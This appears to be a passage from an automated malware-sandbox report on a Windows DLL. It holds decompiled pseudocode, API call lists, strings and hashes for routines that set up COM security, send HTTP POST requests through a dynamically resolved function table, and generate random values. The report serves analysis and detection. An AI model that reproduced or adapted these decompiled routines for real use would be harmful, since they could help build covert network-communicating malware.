								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E10008600( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000db50
0x1000db56
0x1000db5d
0x1000db60
0x1000db63
0x1000db68
0x1000db6a
0x1000db6f
0x1000dfb7
0x1000dfb7
0x1000db7c
0x1000db7e
0x1000db81
0x1000db84
0x1000df9c
0x1000dfa2
0x1000dfac
0x00000000
0x1000dfb1
0x1000db8f
0x1000db96
0x1000db9d
0x1000dba0
0x1000dba5
0x1000dba7
0x1000dbaa
0x1000dbad
0x1000dbae
0x1000dbb7
0x1000dbbd
0x1000dbc0
0x1000dbc9
0x1000dbce
0x1000dbd3
0x1000dbea
0x1000dbf7
0x1000dbfa
0x1000dc01
0x1000dc06
0x1000dc0d
0x1000dc12
0x1000dc19
0x1000dc1b
0x1000dc27
0x1000dc2a
0x1000dc2c
0x1000df8c
0x1000df8d
0x1000df96
0x00000000
0x1000df96
0x1000dc32
0x1000dc35
0x1000dc38
0x1000dc3b
0x1000dc3d
0x1000df58
0x1000df5b
0x1000df5e
0x1000df60
0x1000df82
0x1000df87
0x1000df62
0x1000df65
0x1000df70
0x1000df77
0x1000df77
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dc43
0x1000dc43
0x1000dc55
0x1000dc58
0x1000dc5a
0x00000000
0x00000000
0x1000dc62
0x1000dc65
0x1000dc68
0x1000dc6b
0x1000dc6e
0x1000dc71
0x00000000
0x00000000
0x1000dc77
0x1000dc85
0x1000dc88
0x1000dc8a
0x1000dca3
0x1000dcb2
0x1000dcba
0x1000dcba
0x1000dcbd
0x1000dcc4
0x1000dcc8
0x1000dcce
0x1000dcd0
0x1000df40
0x1000df46
0x1000df4c
0x1000df4f
0x1000df4f
0x00000000
0x1000df4f
0x1000dcdf
0x1000dcf3
0x1000dcf7
0x1000dcf9
0x1000dcfe
0x1000df0d
0x1000df13
0x1000df1e
0x1000df29
0x1000df2f
0x1000df35
0x1000df38
0x00000000
0x1000df38
0x1000dd04
0x1000dedb
0x1000dedb
0x1000dede
0x1000dee1
0x00000000
0x00000000
0x1000dd0c
0x1000dd14
0x1000dd1b
0x1000dd21
0x1000dd23
0x00000000
0x00000000
0x1000dd2c
0x1000dd41
0x1000dd47
0x1000dd50
0x1000dd53
0x1000dd56
0x1000dd58
0x1000dece
0x1000ded1
0x1000deda
0x1000deda
0x00000000
0x1000deda
0x1000dd68
0x1000dd6b
0x1000dd72
0x1000dd78
0x1000dd7b
0x1000dd7e
0x1000dd81
0x1000dd84
0x1000ddc0
0x1000ddc0
0x1000ddc3
0x1000de6f
0x1000de83
0x1000de93
0x1000de97
0x1000de99
0x1000deb0
0x1000deb4
0x1000debd
0x1000dec8
0x00000000
0x1000dec8
0x1000de9f
0x1000dea0
0x1000dea5
0x1000dea5
0x1000dea7
0x1000dea8
0x1000dead
0x00000000
0x1000dead
0x1000ddc9
0x1000ddc9
0x1000ddcc
0x1000de37
0x1000de4b
0x1000de5b
0x1000de5f
0x1000de61
0x00000000
0x00000000
0x1000de67
0x1000de68
0x00000000
0x1000de68
0x1000ddce
0x1000ddce
0x1000ddd1
0x00000000
0x00000000
0x1000ddd3
0x1000ddd6
0x00000000
0x00000000
0x1000ddd8
0x1000ddd8
0x1000ddde
0x1000ddfa
0x1000de09
0x1000de12
0x1000de17
0x1000de1a
0x1000de20
0x1000de20
0x1000de25
0x1000de31
0x00000000
0x1000de31
0x1000dde3
0x00000000
0x1000dde3
0x1000dd86
0x1000ddad
0x1000ddb2
0x1000ddb7
0x1000ddb9
0x1000ddb9
0x00000000
0x1000ddb7
0x1000dd88
0x1000dd88
0x1000dd8b
0x00000000
0x00000000
0x1000dd91
0x1000dd91
0x1000dd94
0x00000000
0x00000000
0x1000dd9a
0x1000dd9a
0x1000dd9d
0x00000000
0x00000000
0x1000dda3
0x1000dda6
0x00000000
0x00000000
0x1000dda8
0x00000000
0x1000dda8
0x1000deea
0x1000def0
0x1000def6
0x1000def9
0x1000defc
0x1000defc
0x1000deff
0x1000df00
0x1000df03
0x1000df05
0x00000000
0x00000000
0x1000df55
0x1000df55
0x00000000
0x1000df55
0x1000dc8c
0x1000dc92
0x00000000
0x1000dc92
0x1000df52
0x00000000
0x1000dbd5
0x1000dbda
0x1000dbdf
0x00000000
0x1000dbe3

APIs

Part of subcall function 1000D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
Part of subcall function 1000D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
Part of subcall function 1000D52E: CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
Part of subcall function 1000D52E: SysAllocString.OLEAUT32(00000000), ref: 1000D574
Part of subcall function 1000D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F

Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

SysAllocString.OLEAUT32(00000000), ref: 1000DBF0
SysAllocString.OLEAUT32(00000000), ref: 1000DC04
SysFreeString.OLEAUT32(?), ref: 1000DF8D
SysFreeString.OLEAUT32(?), ref: 1000DF96

Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646

Strings

FALSE, xrefs: 1000DDB9
TRUE, xrefs: 1000DDB2

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
Instruction ID: 87b8d808fb387f8005252730a36ddfdad2d71f946437a17ee317db8df35d95d4
Opcode Fuzzy Hash: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
Instruction Fuzzy Hash: 82E16375D006199FEB05EFE4CC85EEEBBB9FF08380F10455AE505AB259DB31AA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E673, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095AD(0x85b);
				_v60 = E100095AD(0xdc9);
				_v56 = E100095AD(0x65d);
				_v52 = E100095AD(0xdd3);
				_t105 = E100095AD(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C384(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E100097F2(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E100097F2(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095AD(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C384(_t217), _a4, _a8);
										E100085A8( &_v12);
										if(_a24 != 0) {
											E100097F2(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E1000972F( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x1000e67c
0x1000e68e
0x1000e697
0x1000e6a1
0x1000e6a5
0x1000e6b6
0x1000e6cd
0x1000e6da
0x1000e6e7
0x1000e6f4
0x1000e6f7
0x1000e6fc
0x1000e701
0x1000e703
0x1000e70b
0x1000e716
0x1000e71d
0x1000e729
0x1000e72c
0x1000e73a
0x1000e73d
0x1000e743
0x1000e744
0x1000e746
0x1000e74f
0x1000e750
0x1000e755
0x1000e75b
0x1000e765
0x1000e767
0x1000e76c
0x1000e76c
0x1000e77b
0x1000e78a
0x1000e78e
0x1000e79d
0x1000e7a0
0x1000e7a5
0x1000e7a9
0x1000e7b0
0x1000e7b7
0x1000e7bf
0x1000e7c7
0x1000e7ce
0x1000e7d6
0x1000e7de
0x1000e7e5
0x1000e7ed
0x1000e7f5
0x1000e80a
0x1000e817
0x1000e819
0x1000e81e
0x1000e81e
0x1000e825
0x1000e836
0x1000e83b
0x1000e83d
0x1000e83d
0x1000e851
0x1000e863
0x1000e865
0x1000e868
0x1000e86d
0x1000e86d
0x1000e874
0x1000e883
0x1000e887
0x1000e8c5
0x1000e8ca
0x1000e8d2
0x1000e8d7
0x1000e8e2
0x1000e8e8
0x1000e8f2
0x1000e8f5
0x1000e8fe
0x1000e903
0x1000e903
0x1000e90c
0x1000e955
0x1000e957
0x1000e95e
0x1000e95f
0x1000e962
0x1000e968
0x1000e96c
0x1000e96d
0x1000e972
0x1000e974
0x1000e97a
0x1000e98f
0x1000e997
0x1000e9cc
0x1000e9d1
0x1000e9d6
0x00000000
0x1000e9d8
0x1000e999
0x1000e99b
0x1000e99b
0x1000e9a4
0x1000e9a7
0x1000e9a9
0x1000e9ab
0x1000e9b1
0x1000e9b1
0x1000e9b6
0x1000e9b8
0x1000e9bf
0x1000e9bf
0x00000000
0x1000e9c2
0x1000e97c
0x1000e984
0x00000000
0x1000e90e
0x1000e90e
0x1000e914
0x1000e91a
0x1000e91d
0x00000000
0x1000e91d
0x1000e90c
0x1000e889
0x1000e88f
0x1000e893
0x1000e894
0x1000e899
0x1000e89b
0x1000e8a1
0x1000e8bf
0x1000e8bf
0x00000000
0x1000e8bf
0x1000e8a3
0x1000e8ad
0x1000e8af
0x1000e8b0
0x1000e8b5
0x1000e8b7
0x1000e8bd
0x00000000
0x00000000
0x00000000
0x1000e876
0x1000e876
0x1000e91f
0x1000e91f
0x1000e925
0x1000e928
0x00000000
0x1000e928
0x1000e827
0x1000e827
0x1000e92a
0x1000e92a
0x1000e930
0x1000e933
0x00000000
0x1000e933
0x1000e825
0x1000e790
0x1000e935
0x1000e938
0x1000e93a
0x1000e93d
0x1000e940
0x1000e949
0x1000e94e
0x00000000
0x00000000
0x1000e952
0x00000000
0x1000e952
0x1000e75f
0x00000000

APIs

memset.MSVCRT ref: 1000E6A5
memset.MSVCRT ref: 1000E6B6
memset.MSVCRT ref: 1000E70B
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E790

Strings

POST, xrefs: 1000E856

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
Instruction ID: 7105dce4f630bd9e6e6a53a20e835c867cf8d9cfb236b462118b6997004ea025
Opcode Fuzzy Hash: b2cbd98b9ed9432ed6e1f8a9232582811ae6687bac74e989c4c0fe043f55e73f
Instruction Fuzzy Hash: C2B14CB1900259AFEB55DFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116C3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116C3(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x100116cc
0x100116d3
0x100116dc
0x100116e0
0x1001175b
0x00000000
0x1001175d
0x100116ee
0x100116f0
0x100116f5
0x00000000
0x00000000
0x100116fd
0x100116ff
0x10011704
0x00000000
0x00000000
0x1001170e
0x10011712
0x00000000
0x00000000
0x10011714
0x10011719
0x1001171b
0x1001171c
0x10011720
0x10011726
0x00000000
0x00000000
0x10011731
0x1001173a
0x1001173e
0x00000000
0x00000000
0x10011740
0x10011742
0x1001174a
0x1001174c
0x1001174d
0x10011755
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,10007640,?,?,00000000,?), ref: 100116D6
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 100116EE
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 100116FD
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 1001170C

Strings

CryptAcquireContextA, xrefs: 100116E8
advapi32.dll, xrefs: 100116CE
CryptReleaseContext, xrefs: 10011706
CryptGenRandom, xrefs: 100116F7

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
Instruction ID: db89102dffd2ab17b34e924f896f3f155d97b8305924242c9699015d1af8b324
Opcode Fuzzy Hash: ec5d92e1c0308c86bfae05b88449f1b683c9b71fc9a535634b09132dc4920ded
Instruction Fuzzy Hash: 32119431A04619BADB51DBB98C84DFE7BFAEF45640F100464EA05EB280D730CB408B64

Uniqueness

Uniqueness Score: -1.00%

Function 1001212D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012290();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122D8();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E100086EC(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109bd
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x10012130
0x10012135
0x10012139
0x10012139
0x1001213e
0x10012143
0x10012144
0x10012147
0x10012148
0x1001214d
0x10012150
0x10012151
0x10012156
0x1001215d
0x10012203
0x10012203
0x00000000
0x1001216c
0x1001216c
0x10012173
0x10012177
0x1001217e
0x10012187
0x10012189
0x10012189
0x10012187
0x10012198
0x100121be
0x100121c7
0x100121c9
0x100121cf
0x100121fe
0x100121fe
0x10012206
0x10012209
0x10012209
0x100121d1
0x100121d2
0x100121d8
0x100121da
0x100121da
0x100121df
0x100121de
0x100121de
0x100121e6
0x100121f2
0x100121fc
0x100121fc
0x00000000
0x100121a8
0x100121a8
0x100121a8
0x100121ae
0x00000000
0x00000000
0x100121b0
0x100121b6
0x100121bb
0x00000000
0x100121bb
0x10012198

APIs

_snprintf.MSVCRT ref: 10012151
localeconv.MSVCRT ref: 1001216C
strchr.MSVCRT ref: 1001217E
strchr.MSVCRT ref: 1001218F
strchr.MSVCRT ref: 1001219D
strchr.MSVCRT ref: 100121C2

Strings

%.*g, xrefs: 10012148

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
Instruction ID: 78b3385665a9946d17acecbf697c3f69bb23403c9f6092c9c513caadce452e38
Opcode Fuzzy Hash: 178342c51bf590373a94578d315e398ece8844776024473a8b6624bac67a40ef
Instruction Fuzzy Hash: FD2145FA60424A3AE321CA689C85BAF37DCDF11270F150115FE408F182E674ECF083A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102BD, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 1001033D
qsort.MSVCRT ref: 100105BB

Strings

%I64d, xrefs: 1001032F
false, xrefs: 10010320
true, xrefs: 10010314
null, xrefs: 10010302

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
Instruction ID: 256b45a573985ee8e5ebbb4f1a01ee0a2bda1a8772a5177783226d7c6d43e220
Opcode Fuzzy Hash: d538ba18bf1a1900acc1de5f1acfcc1d0ab55a19687b0d007d211ebddbd5affd
Instruction Fuzzy Hash: 1AE17FB1A0020ABFDF11DE65CC46EEF3BA9EF44384F108015FD949E151E7B1DAA19BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0C, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0C(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2ff04a0
					_t125 =  *0x1001e68c; // 0x306fa40
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB73(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B78E(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B663(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C8( &_v1076,  &_v1076, _t206);
					_t141 = E1000D40B( &_v1076, E1000C384( &_v1076), 0);
					E1000B870(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092CB(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2ff04a0
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091C9(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091C9(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9c2);
								E10009F2E(0xe);
								E10009F52(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A091(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3D3(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3D3(_t188, _t180, _t208);
								}
								_t87 = E100097F2(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A091(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2ff04a0
